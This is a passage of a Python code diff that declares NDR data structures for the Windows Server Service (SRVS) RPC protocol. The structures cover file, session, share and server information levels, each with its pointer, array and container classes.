+class LPFILE_INFO_2_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', FILE_INFO_2_ARRAY),
+ )
+
+# 2.2.4.7 FILE_INFO_3
+class FILE_INFO_3(NDRSTRUCT):
+ structure = (
+ ('fi3_id', DWORD),
+ ('fi3_permissions', DWORD),
+ ('fi3_num_locks', DWORD),
+ ('fi3_path_name', LPWSTR),
+ ('fi3_username', LPWSTR),
+ )
+
+class LPFILE_INFO_3(NDRPOINTER):
+ referent = (
+ ('Data', FILE_INFO_3),
+ )
+
+class FILE_INFO_3_ARRAY(NDRUniConformantArray):
+ item = FILE_INFO_3
+
+class LPFILE_INFO_3_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', FILE_INFO_3_ARRAY),
+ )
+
+# 2.2.4.8 FILE_INFO_2_CONTAINER
+class FILE_INFO_2_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPFILE_INFO_2_ARRAY),
+ )
+
+class LPFILE_INFO_2_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', FILE_INFO_2_CONTAINER),
+ )
+
+# 2.2.4.9 FILE_INFO_3_CONTAINER
+class FILE_INFO_3_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPFILE_INFO_3_ARRAY),
+ )
+
+class LPFILE_INFO_3_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', FILE_INFO_3_CONTAINER),
+ )
+
+# 2.2.3.2 FILE_ENUM_UNION
+class FILE_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', DWORD),
+ )
+
+ union = {
+ 2: ('Level2', LPFILE_INFO_2_CONTAINER),
+ 3: ('Level3', LPFILE_INFO_3_CONTAINER),
+ }
+
+# 2.2.4.10 FILE_ENUM_STRUCT
+class FILE_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', DWORD),
+ ('FileInfo', FILE_ENUM_UNION),
+ )
+
+# 2.2.4.11 SESSION_INFO_0
+class SESSION_INFO_0(NDRSTRUCT):
+ structure = (
+ ('sesi0_cname', LPWSTR),
+ )
+
+class LPSESSION_INFO_0(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_0),
+ )
+
+class SESSION_INFO_0_ARRAY(NDRUniConformantArray):
+ item = SESSION_INFO_0
+
+class LPSESSION_INFO_0_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_0_ARRAY),
+ )
+
+# 2.2.4.12 SESSION_INFO_1
+class SESSION_INFO_1(NDRSTRUCT):
+ structure = (
+ ('sesi1_cname', LPWSTR),
+ ('sesi1_username', LPWSTR),
+ ('sesi1_num_opens', DWORD),
+ ('sesi1_time', DWORD),
+ ('sesi1_idle_time', DWORD),
+ ('sesi1_user_flags', DWORD),
+ )
+
+class LPSESSION_INFO_1(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_1),
+ )
+
+class SESSION_INFO_1_ARRAY(NDRUniConformantArray):
+ item = SESSION_INFO_1
+
+class LPSESSION_INFO_1_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_1_ARRAY),
+ )
+
+# 2.2.4.13 SESSION_INFO_2
+class SESSION_INFO_2(NDRSTRUCT):
+ structure = (
+ ('sesi2_cname', LPWSTR),
+ ('sesi2_username', LPWSTR),
+ ('sesi2_num_opens', DWORD),
+ ('sesi2_time', DWORD),
+ ('sesi2_idle_time', DWORD),
+ ('sesi2_user_flags', DWORD),
+ ('sesi2_cltype_name', LPWSTR),
+ )
+
+class LPSESSION_INFO_2(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_2),
+ )
+
+class SESSION_INFO_2_ARRAY(NDRUniConformantArray):
+ item = SESSION_INFO_2
+
+class LPSESSION_INFO_2_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_2_ARRAY),
+ )
+
+# 2.2.4.14 SESSION_INFO_10
+class SESSION_INFO_10(NDRSTRUCT):
+ structure = (
+ ('sesi10_cname', LPWSTR),
+ ('sesi10_username', LPWSTR),
+ ('sesi10_time', DWORD),
+ ('sesi10_idle_time', DWORD),
+ )
+
+class LPSESSION_INFO_10(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_10),
+ )
+
+class SESSION_INFO_10_ARRAY(NDRUniConformantArray):
+ item = SESSION_INFO_10
+
+class LPSESSION_INFO_10_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_10_ARRAY),
+ )
+
+# 2.2.4.15 SESSION_INFO_502
+class SESSION_INFO_502(NDRSTRUCT):
+ structure = (
+ ('sesi502_cname', LPWSTR),
+ ('sesi502_username', LPWSTR),
+ ('sesi502_num_opens', DWORD),
+ ('sesi502_time', DWORD),
+ ('sesi502_idle_time', DWORD),
+ ('sesi502_user_flags', DWORD),
+ ('sesi502_cltype_name', LPWSTR),
+ ('sesi502_transport', LPWSTR),
+ )
+
+class LPSESSION_INFO_502(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_502),
+ )
+
+class SESSION_INFO_502_ARRAY(NDRUniConformantArray):
+ item = SESSION_INFO_502
+
+class LPSESSION_INFO_502_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_502_ARRAY),
+ )
+
+# 2.2.4.16 SESSION_INFO_0_CONTAINER
+class SESSION_INFO_0_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSESSION_INFO_0_ARRAY),
+ )
+
+class LPSESSION_INFO_0_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_0_CONTAINER),
+ )
+
+# 2.2.4.17 SESSION_INFO_1_CONTAINER
+class SESSION_INFO_1_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSESSION_INFO_1_ARRAY),
+ )
+
+class LPSESSION_INFO_1_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_1_CONTAINER),
+ )
+
+# 2.2.4.18 SESSION_INFO_2_CONTAINER
+class SESSION_INFO_2_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSESSION_INFO_2_ARRAY),
+ )
+
+class LPSESSION_INFO_2_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_2_CONTAINER),
+ )
+
+# 2.2.4.19 SESSION_INFO_10_CONTAINER
+class SESSION_INFO_10_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSESSION_INFO_10_ARRAY),
+ )
+
+class LPSESSION_INFO_10_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_10_CONTAINER),
+ )
+
+# 2.2.4.20 SESSION_INFO_502_CONTAINER
+class SESSION_INFO_502_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSESSION_INFO_502_ARRAY),
+ )
+
+class LPSESSION_INFO_502_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SESSION_INFO_502_CONTAINER),
+ )
+
+# 2.2.3.4 SESSION_ENUM_UNION
+class SESSION_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', DWORD),
+ )
+
+ union = {
+ 0: ('Level0', LPSESSION_INFO_0_CONTAINER),
+ 1: ('Level1', LPSESSION_INFO_1_CONTAINER),
+ 2: ('Level2', LPSESSION_INFO_2_CONTAINER),
+ 10: ('Level10', LPSESSION_INFO_10_CONTAINER),
+ 502: ('Level502', LPSESSION_INFO_502_CONTAINER),
+ }
+
+# 2.2.4.21 SESSION_ENUM_STRUCT
+class SESSION_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', DWORD),
+ ('SessionInfo', SESSION_ENUM_UNION),
+ )
+
+# 2.2.4.22 SHARE_INFO_0
+class SHARE_INFO_0(NDRSTRUCT):
+ structure = (
+ ('shi0_netname', LPWSTR),
+ )
+
+class LPSHARE_INFO_0(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_0),
+ )
+
+class SHARE_INFO_0_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_0
+
+class LPSHARE_INFO_0_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_0_ARRAY),
+ )
+
+# 2.2.4.23 SHARE_INFO_1
+class SHARE_INFO_1(NDRSTRUCT):
+ structure = (
+ ('shi1_netname', LPWSTR),
+ ('shi1_type', DWORD),
+ ('shi1_remark', LPWSTR),
+ )
+
+class LPSHARE_INFO_1(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1),
+ )
+
+class SHARE_INFO_1_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_1
+
+class LPSHARE_INFO_1_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1_ARRAY),
+ )
+
+# 2.2.4.24 SHARE_INFO_2
+class SHARE_INFO_2(NDRSTRUCT):
+ structure = (
+ ('shi2_netname', LPWSTR),
+ ('shi2_type', DWORD),
+ ('shi2_remark', LPWSTR),
+ ('shi2_permissions', DWORD),
+ ('shi2_max_uses', DWORD),
+ ('shi2_current_uses', DWORD),
+ ('shi2_path', LPWSTR),
+ ('shi2_passwd', LPWSTR),
+ )
+
+class LPSHARE_INFO_2(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_2),
+ )
+
+class SHARE_INFO_2_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_2
+
+class LPSHARE_INFO_2_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_2_ARRAY),
+ )
+
+# 2.2.4.25 SHARE_INFO_501
+class SHARE_INFO_501(NDRSTRUCT):
+ structure = (
+ ('shi501_netname', LPWSTR),
+ ('shi501_type', DWORD),
+ ('shi501_remark', LPWSTR),
+ ('shi501_flags', DWORD),
+ )
+
+class LPSHARE_INFO_501(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_501),
+ )
+
+class SHARE_INFO_501_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_501
+
+class LPSHARE_INFO_501_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_501_ARRAY),
+ )
+
+# 2.2.4.26 SHARE_INFO_502_I
+class SHARE_INFO_502(NDRSTRUCT):
+ structure = (
+ ('shi502_netname', LPWSTR),
+ ('shi502_type', DWORD),
+ ('shi502_remark', LPWSTR),
+ ('shi502_permissions', DWORD),
+ ('shi502_max_uses', DWORD),
+ ('shi502_current_uses', DWORD),
+ ('shi502_path', LPWSTR),
+ ('shi502_passwd', LPWSTR),
+ ('shi502_reserved', DWORD),
+ ('shi502_security_descriptor', LPBYTE),
+ )
+
+class LPSHARE_INFO_502(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_502),
+ )
+
+class SHARE_INFO_502_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_502
+
+class LPSHARE_INFO_502_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_502_ARRAY),
+ )
+
+# 2.2.4.27 SHARE_INFO_503_I
+class SHARE_INFO_503(NDRSTRUCT):
+ structure = (
+ ('shi503_netname', LPWSTR),
+ ('shi503_type', DWORD),
+ ('shi503_remark', LPWSTR),
+ ('shi503_permissions', DWORD),
+ ('shi503_max_uses', DWORD),
+ ('shi503_current_uses', DWORD),
+ ('shi503_path', LPWSTR),
+ ('shi503_passwd', LPWSTR),
+ ('shi503_servername', LPWSTR),
+ ('shi503_reserved', DWORD),
+ ('shi503_security_descriptor', LPBYTE),
+ )
+
+class LPSHARE_INFO_503(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_503),
+ )
+
+class SHARE_INFO_503_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_503
+
+class LPSHARE_INFO_503_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_503_ARRAY),
+ )
+
+# 2.2.4.28 SHARE_INFO_1004
+class SHARE_INFO_1004(NDRSTRUCT):
+ structure = (
+ ('shi1004_remark', LPWSTR),
+ )
+
+class LPSHARE_INFO_1004(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1004),
+ )
+
+class SHARE_INFO_1004_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_1004
+
+class LPSHARE_INFO_1004_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1004_ARRAY),
+ )
+
+# 2.2.4.29 SHARE_INFO_1005
+class SHARE_INFO_1005(NDRSTRUCT):
+ structure = (
+ ('shi1005_flags', DWORD),
+ )
+
+class LPSHARE_INFO_1005(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1005),
+ )
+
+class SHARE_INFO_1005_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_1004
+
+class LPSHARE_INFO_1005_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1005_ARRAY),
+ )
+
+# 2.2.4.30 SHARE_INFO_1006
+class SHARE_INFO_1006(NDRSTRUCT):
+ structure = (
+ ('shi1006_max_uses', DWORD),
+ )
+
+class LPSHARE_INFO_1006(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1006),
+ )
+
+class SHARE_INFO_1006_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_1006
+
+class LPSHARE_INFO_1006_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1006_ARRAY),
+ )
+
+# 2.2.4.31 SHARE_INFO_1501_I
+class SHARE_INFO_1501(NDRSTRUCT):
+ structure = (
+ ('shi1501_reserved', DWORD),
+ ('shi1501_security_descriptor', NDRUniConformantArray),
+ )
+
+class LPSHARE_INFO_1501(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1501),
+ )
+
+class SHARE_INFO_1501_ARRAY(NDRUniConformantArray):
+ item = SHARE_INFO_1501
+
+class LPSHARE_INFO_1501_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1501_ARRAY),
+ )
+
+# 2.2.4.32 SHARE_INFO_0_CONTAINER
+class SHARE_INFO_0_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSHARE_INFO_0_ARRAY),
+ )
+
+class LPSHARE_INFO_0_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_0_CONTAINER),
+ )
+
+# 2.2.4.33 SHARE_INFO_1_CONTAINER
+class SHARE_INFO_1_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSHARE_INFO_1_ARRAY),
+ )
+
+class LPSHARE_INFO_1_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_1_CONTAINER),
+ )
+
+# 2.2.4.34 SHARE_INFO_2_CONTAINER
+class SHARE_INFO_2_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSHARE_INFO_2_ARRAY),
+ )
+
+class LPSHARE_INFO_2_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_2_CONTAINER),
+ )
+
+# 2.2.4.35 SHARE_INFO_501_CONTAINER
+class SHARE_INFO_501_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSHARE_INFO_501_ARRAY),
+ )
+
+class LPSHARE_INFO_501_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_501_CONTAINER),
+ )
+
+# 2.2.4.36 SHARE_INFO_502_CONTAINER
+class SHARE_INFO_502_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSHARE_INFO_502_ARRAY),
+ )
+
+class LPSHARE_INFO_502_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_502_CONTAINER),
+ )
+
+# 2.2.4.37 SHARE_INFO_503_CONTAINER
+class SHARE_INFO_503_CONTAINER(NDRSTRUCT):
+ structure = (
+ ('EntriesRead', DWORD),
+ ('Buffer', LPSHARE_INFO_503_ARRAY),
+ )
+
+class LPSHARE_INFO_503_CONTAINER(NDRPOINTER):
+ referent = (
+ ('Data', SHARE_INFO_503_CONTAINER),
+ )
+
+# 2.2.3.5 SHARE_ENUM_UNION
+class SHARE_ENUM_UNION(NDRUNION):
+ commonHdr = (
+ ('tag', DWORD),
+ )
+
+ union = {
+ 0: ('Level0', LPSHARE_INFO_0_CONTAINER),
+ 1: ('Level1', LPSHARE_INFO_1_CONTAINER),
+ 2: ('Level2', LPSHARE_INFO_2_CONTAINER),
+ 501: ('Level501', LPSHARE_INFO_501_CONTAINER),
+ 502: ('Level502', LPSHARE_INFO_502_CONTAINER),
+ 503: ('Level503', LPSHARE_INFO_503_CONTAINER),
+ }
+
+# 2.2.4.38 SHARE_ENUM_STRUCT
+class SHARE_ENUM_STRUCT(NDRSTRUCT):
+ structure = (
+ ('Level', DWORD),
+ ('ShareInfo', SHARE_ENUM_UNION),
+ )
+
+# 2.2.4.39 STAT_SERVER_0
+class STAT_SERVER_0(NDRSTRUCT):
+ structure = (
+ ('sts0_start', DWORD),
+ ('sts0_fopens', DWORD),
+ ('sts0_devopens', DWORD),
+ ('sts0_jobsqueued', DWORD),
+ ('sts0_sopens', DWORD),
+ ('sts0_stimedout', DWORD),
+ ('sts0_serrorout', DWORD),
+ ('sts0_pwerrors', DWORD),
+ ('sts0_permerrors', DWORD),
+ ('sts0_syserrors', DWORD),
+ ('sts0_bytessent_low', DWORD),
+ ('sts0_bytessent_high', DWORD),
+ ('sts0_bytesrcvd_low', DWORD),
+ ('sts0_bytesrcvd_high', DWORD),
+ ('sts0_avresponse', DWORD),
+ ('sts0_reqbufneed', DWORD),
+ ('sts0_bigbufneed', DWORD),
+ )
+
+class LPSTAT_SERVER_0(NDRPOINTER):
+ referent = (
+ ('Data', STAT_SERVER_0),
+ )
+
+# 2.2.4.40 SERVER_INFO_100
+class SERVER_INFO_100(NDRSTRUCT):
+ structure = (
+ ('sv100_platform_id', DWORD),
+ ('sv100_name', LPWSTR),
+ )
+
+class LPSERVER_INFO_100(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_100),
+ )
+
+# 2.2.4.41 SERVER_INFO_101
+class SERVER_INFO_101(NDRSTRUCT):
+ structure = (
+ ('sv101_platform_id', DWORD),
+ ('sv101_name', LPWSTR),
+ ('sv101_version_major', DWORD),
+ ('sv101_version_minor', DWORD),
+ ('sv101_type', DWORD),
+ ('sv101_comment', LPWSTR),
+ )
+
+class LPSERVER_INFO_101(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_101),
+ )
+
+# 2.2.4.42 SERVER_INFO_102
+class SERVER_INFO_102(NDRSTRUCT):
+ structure = (
+ ('sv102_platform_id', DWORD),
+ ('sv102_name', LPWSTR),
+ ('sv102_version_major', DWORD),
+ ('sv102_version_minor', DWORD),
+ ('sv102_type', DWORD),
+ ('sv102_comment', LPWSTR),
+ ('sv102_users', DWORD),
+ ('sv102_disc', DWORD),
+ ('sv102_hidden', DWORD),
+ ('sv102_announce', DWORD),
+ ('sv102_anndelta', DWORD),
+ ('sv102_licenses', DWORD),
+ ('sv102_userpath', LPWSTR),
+ )
+
+class LPSERVER_INFO_102(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_102),
+ )
+
+# 2.2.4.43 SERVER_INFO_103
+class SERVER_INFO_103(NDRSTRUCT):
+ structure = (
+ ('sv103_platform_id', DWORD),
+ ('sv103_name', LPWSTR),
+ ('sv103_version_major', DWORD),
+ ('sv103_version_minor', DWORD),
+ ('sv103_type', DWORD),
+ ('sv103_comment', LPWSTR),
+ ('sv103_users', DWORD),
+ ('sv103_disc', DWORD),
+ ('sv103_hidden', DWORD),
+ ('sv103_announce', DWORD),
+ ('sv103_anndelta', DWORD),
+ ('sv103_licenses', DWORD),
+ ('sv103_userpath', LPWSTR),
+ ('sv103_capabilities', DWORD),
+ )
+
+class LPSERVER_INFO_103(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_103),
+ )
+
+# 2.2.4.44 SERVER_INFO_502
+class SERVER_INFO_502(NDRSTRUCT):
+ structure = (
+ ('sv502_sessopens', DWORD),
+ ('sv502_sessvcs', DWORD),
+ ('sv502_opensearch', DWORD),
+ ('sv502_sizreqbuf', DWORD),
+ ('sv502_initworkitems', DWORD),
+ ('sv502_maxworkitems', DWORD),
+ ('sv502_rawworkitems', DWORD),
+ ('sv502_irpstacksize', DWORD),
+ ('sv502_maxrawbuflen', DWORD),
+ ('sv502_sessusers', DWORD),
+ ('sv502_sessconns', DWORD),
+ ('sv502_maxpagedmemoryusage', DWORD),
+ ('sv502_maxnonpagedmemoryusage', DWORD),
+ ('sv502_enablesoftcompat', DWORD),
+ ('sv502_enableforcedlogoff', DWORD),
+ ('sv502_timesource', DWORD),
+ ('sv502_acceptdownlevelapis', DWORD),
+ ('sv502_lmannounce', DWORD),
+ )
+
+class LPSERVER_INFO_502(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_502),
+ )
+
+# 2.2.4.45 SERVER_INFO_503
+class SERVER_INFO_503(NDRSTRUCT):
+ structure = (
+ ('sv503_sessopens', DWORD),
+ ('sv503_sessvcs', DWORD),
+ ('sv503_opensearch', DWORD),
+ ('sv503_sizreqbuf', DWORD),
+ ('sv503_initworkitems', DWORD),
+ ('sv503_maxworkitems', DWORD),
+ ('sv503_rawworkitems', DWORD),
+ ('sv503_irpstacksize', DWORD),
+ ('sv503_maxrawbuflen', DWORD),
+ ('sv503_sessusers', DWORD),
+ ('sv503_sessconns', DWORD),
+ ('sv503_maxpagedmemoryusage', DWORD),
+ ('sv503_maxnonpagedmemoryusage', DWORD),
+ ('sv503_enablesoftcompat', DWORD),
+ ('sv503_enableforcedlogoff', DWORD),
+ ('sv503_timesource', DWORD),
+ ('sv503_acceptdownlevelapis', DWORD),
+ ('sv503_lmannounce', DWORD),
+ ('sv503_domain', LPWSTR),
+ ('sv503_maxcopyreadlen', DWORD),
+ ('sv503_maxcopywritelen', DWORD),
+ ('sv503_minkeepsearch', DWORD),
+ ('sv503_maxkeepsearch', DWORD),
+ ('sv503_minkeepcomplsearch', DWORD),
+ ('sv503_maxkeepcomplsearch', DWORD),
+ ('sv503_threadcountadd', DWORD),
+ ('sv503_numblockthreads', DWORD),
+ ('sv503_scavtimeout', DWORD),
+ ('sv503_minrcvqueue', DWORD),
+ ('sv503_minfreeworkitems', DWORD),
+ ('sv503_xactmemsize', DWORD),
+ ('sv503_threadpriority', DWORD),
+ ('sv503_maxmpxct', DWORD),
+ ('sv503_oplockbreakwait', DWORD),
+ ('sv503_oplockbreakresponsewait', DWORD),
+ ('sv503_enableoplocks', DWORD),
+ ('sv503_enableoplockforceclose', DWORD),
+ ('sv503_enablefcbopens', DWORD),
+ ('sv503_enableraw', DWORD),
+ ('sv503_enablesharednetdrives', DWORD),
+ ('sv503_minfreeconnections', DWORD),
+ ('sv503_maxfreeconnections', DWORD),
+ )
+
+class LPSERVER_INFO_503(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_503),
+ )
+
+# 2.2.4.46 SERVER_INFO_599
+class SERVER_INFO_599(NDRSTRUCT):
+ structure = (
+ ('sv599_sessopens', DWORD),
+ ('sv599_sessvcs', DWORD),
+ ('sv599_opensearch', DWORD),
+ ('sv599_sizreqbuf', DWORD),
+ ('sv599_initworkitems', DWORD),
+ ('sv599_maxworkitems', DWORD),
+ ('sv599_rawworkitems', DWORD),
+ ('sv599_irpstacksize', DWORD),
+ ('sv599_maxrawbuflen', DWORD),
+ ('sv599_sessusers', DWORD),
+ ('sv599_sessconns', DWORD),
+ ('sv599_maxpagedmemoryusage', DWORD),
+ ('sv599_maxnonpagedmemoryusage', DWORD),
+ ('sv599_enablesoftcompat', DWORD),
+ ('sv599_enableforcedlogoff', DWORD),
+ ('sv599_timesource', DWORD),
+ ('sv599_acceptdownlevelapis', DWORD),
+ ('sv599_lmannounce', DWORD),
+ ('sv599_domain', LPWSTR),
+ ('sv599_maxcopyreadlen', DWORD),
+ ('sv599_maxcopywritelen', DWORD),
+ ('sv599_minkeepsearch', DWORD),
+ ('sv599_maxkeepsearch', DWORD),
+ ('sv599_minkeepcomplsearch', DWORD),
+ ('sv599_maxkeepcomplsearch', DWORD),
+ ('sv599_threadcountadd', DWORD),
+ ('sv599_numblockthreads', DWORD),
+ ('sv599_scavtimeout', DWORD),
+ ('sv599_minrcvqueue', DWORD),
+ ('sv599_minfreeworkitems', DWORD),
+ ('sv599_xactmemsize', DWORD),
+ ('sv599_threadpriority', DWORD),
+ ('sv599_maxmpxct', DWORD),
+ ('sv599_oplockbreakwait', DWORD),
+ ('sv599_oplockbreakresponsewait', DWORD),
+ ('sv599_enableoplocks', DWORD),
+ ('sv599_enableoplockforceclose', DWORD),
+ ('sv599_enablefcbopens', DWORD),
+ ('sv599_enableraw', DWORD),
+ ('sv599_enablesharednetdrives', DWORD),
+ ('sv599_minfreeconnections', DWORD),
+ ('sv599_maxfreeconnections', DWORD),
+ ('sv599_initsesstable', DWORD),
+ ('sv599_initconntable', DWORD),
+ ('sv599_initfiletable', DWORD),
+ ('sv599_initsearchtable', DWORD),
+ ('sv599_alertschedule', DWORD),
+ ('sv599_errorthreshold', DWORD),
+ ('sv599_networkerrorthreshold', DWORD),
+ ('sv599_diskspacethreshold', DWORD),
+ ('sv599_reserved', DWORD),
+ ('sv599_maxlinkdelay', DWORD),
+ ('sv599_minlinkthroughput', DWORD),
+ ('sv599_linkinfovalidtime', DWORD),
+ ('sv599_scavqosinfoupdatetime', DWORD),
+ ('sv599_maxworkitemidletime', DWORD),
+ )
+
+class LPSERVER_INFO_599(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_599),
+ )
+
+# 2.2.4.47 SERVER_INFO_1005
+class SERVER_INFO_1005(NDRSTRUCT):
+ structure = (
+ ('sv1005_comment', LPWSTR),
+ )
+
+class LPSERVER_INFO_1005(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1005),
+ )
+
+# 2.2.4.48 SERVER_INFO_1107
+class SERVER_INFO_1107(NDRSTRUCT):
+ structure = (
+ ('sv1107_users', DWORD),
+ )
+
+class LPSERVER_INFO_1107(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1107),
+ )
+
+# 2.2.4.49 SERVER_INFO_1010
+class SERVER_INFO_1010(NDRSTRUCT):
+ structure = (
+ ('sv1010_disc', DWORD),
+ )
+
+class LPSERVER_INFO_1010(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1010),
+ )
+
+# 2.2.4.50 SERVER_INFO_1016
+class SERVER_INFO_1016(NDRSTRUCT):
+ structure = (
+ ('sv1016_hidden', DWORD),
+ )
+
+class LPSERVER_INFO_1016(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1016),
+ )
+
+# 2.2.4.51 SERVER_INFO_1017
+class SERVER_INFO_1017(NDRSTRUCT):
+ structure = (
+ ('sv1017_announce', DWORD),
+ )
+
+class LPSERVER_INFO_1017(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1017),
+ )
+
+# 2.2.4.52 SERVER_INFO_1018
+class SERVER_INFO_1018(NDRSTRUCT):
+ structure = (
+ ('sv1018_anndelta', DWORD),
+ )
+
+class LPSERVER_INFO_1018(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1018),
+ )
+
+# 2.2.4.53 SERVER_INFO_1501
+class SERVER_INFO_1501(NDRSTRUCT):
+ structure = (
+ ('sv1501_sessopens', DWORD),
+ )
+
+class LPSERVER_INFO_1501(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1501),
+ )
+
+# 2.2.4.54 SERVER_INFO_1502
+class SERVER_INFO_1502(NDRSTRUCT):
+ structure = (
+ ('sv1502_sessvcs', DWORD),
+ )
+
+class LPSERVER_INFO_1502(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1502),
+ )
+
+# 2.2.4.55 SERVER_INFO_1503
+class SERVER_INFO_1503(NDRSTRUCT):
+ structure = (
+ ('sv1503_opensearch', DWORD),
+ )
+
+class LPSERVER_INFO_1503(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1503),
+ )
+
+# 2.2.4.56 SERVER_INFO_1506
+class SERVER_INFO_1506(NDRSTRUCT):
+ structure = (
+ ('sv1506_maxworkitems', DWORD),
+ )
+
+class LPSERVER_INFO_1506(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1506),
+ )
+
+# 2.2.4.57 SERVER_INFO_1510
+class SERVER_INFO_1510(NDRSTRUCT):
+ structure = (
+ ('sv1510_sessusers', DWORD),
+ )
+
+class LPSERVER_INFO_1510(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1510),
+ )
+
+# 2.2.4.58 SERVER_INFO_1511
+class SERVER_INFO_1511(NDRSTRUCT):
+ structure = (
+ ('sv1511_sessconns', DWORD),
+ )
+
+class LPSERVER_INFO_1511(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1511),
+ )
+
+# 2.2.4.59 SERVER_INFO_1512
+class SERVER_INFO_1512(NDRSTRUCT):
+ structure = (
+ ('sv1512_maxnonpagedmemoryusage', DWORD),
+ )
+
+class LPSERVER_INFO_1512(NDRPOINTER):
+ referent = (
+ ('Data', SERVER_INFO_1512),
+ )
+
+# 2.2.4.60 SERVER_INFO_1513
+class SERVER_INFO_1513(NDRSTRUCT):
